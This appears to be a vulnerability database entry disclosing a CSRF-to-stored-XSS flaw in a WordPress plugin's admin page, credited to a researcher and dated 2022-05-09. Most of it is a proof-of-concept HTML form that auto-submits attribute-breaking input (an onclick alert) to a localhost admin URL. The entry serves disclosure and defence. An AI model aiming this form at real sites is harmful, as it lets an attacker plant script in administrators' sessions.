The plugin does not properly check CSRF tokens on POST requests to the plugins admin page, and does not sanitise some parameters, leading to a stored Cross-Site Scripting vulnerability where an attacker can trick a logged in administrator to inject arbitrary javascript.
<html> <body> <form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php"> <input type="hidden" name="email" value="[email protected]"/> <input type="hidden" name="userPassword" value="Test123"/> <input type="hidden" name="userDisplayName" value="test123"/> <input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/> <input type="submit" value="Submit"> </form> </body> <html> XSS will be triggered when admin click "Go to Web Application"
muhamad hidayat
muhamad hidayat
Yes
2022-05-09 (about 8 months ago)
2022-05-09 (about 8 months ago)
2022-05-09 (about 8 months ago)